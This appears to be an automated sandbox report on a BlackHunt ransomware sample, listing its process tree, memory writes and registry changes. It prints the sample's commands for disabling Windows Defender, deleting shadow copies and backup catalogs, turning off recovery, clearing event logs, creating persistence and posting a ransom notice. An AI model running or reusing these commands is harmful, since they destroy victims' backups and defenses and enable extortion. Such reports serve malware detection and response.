3684 wrote to memory of 1076 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 112 PID 3684 wrote to memory of 1076 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 112 PID 3684 wrote to memory of 5064 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 116 PID 3684 wrote to memory of 5064 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 116 PID 1780 wrote to memory of 4128 1780 cmd.exe 212 PID 1780 wrote to memory of 4128 1780 cmd.exe 212 PID 3684 wrote to memory of 4332 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 211 PID 3684 wrote to memory of 4332 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 211 PID 2132 wrote to memory of 1940 2132 cmd.exe 119 PID 2132 wrote to memory of 1940 2132 cmd.exe 119 PID 3684 wrote to memory of 4604 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 118 PID 3684 wrote to memory of 4604 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 118 PID 468 wrote to memory of 4576 468 cmd.exe 120 PID 468 wrote to memory of 4576 468 cmd.exe 120 PID 1076 wrote to memory of 4996 1076 cmd.exe 206 PID 1076 wrote to memory of 4996 1076 cmd.exe 206 PID 3684 wrote to memory of 1528 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 121 PID 3684 wrote to memory of 1528 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 121 PID 3684 wrote to memory of 920 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 126 PID 3684 wrote to memory of 920 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 126 PID 3684 wrote to memory of 3980 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 123 PID 3684 wrote to memory of 3980 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 123 PID 4332 wrote to memory of 1064 4332 cmd.exe 127 PID 4332 wrote to memory of 1064 4332 cmd.exe 127 PID 5064 wrote to memory of 208 5064 cmd.exe 129 PID 5064 wrote to memory of 208 5064 cmd.exe 129 PID 3684 wrote to memory of 4568 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 252 PID 3684 wrote to memory of 4568 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 252 PID 4604 wrote to memory of 760 4604 cmd.exe 132 PID 4604 wrote to memory of 760 4604 cmd.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe"C:\Users\Admin\AppData\Local\Temp\cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1340
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:8312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:9168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:3176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6092
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe" /F3⤵
- Creates scheduled task(s)
PID:8320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4128
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3888
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1628
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1696
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1492
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1868
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1004
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1976
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1440
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:14164
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:6732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:14192
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:6004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:14312
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6040
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2488
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6164
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:6796
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1248
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:9920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4568
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:7028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7796
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:2584 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:8172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 14604⤵
- Program crash
PID:10000
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3028
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:10040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:9060
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:7784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11904
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12096
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe"2⤵PID:8356
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:10124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:14332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:14228
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵
- Modifies registry class
PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:6768
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8252
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:6016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:6084
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8336
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:4128
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8412
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:14280
-
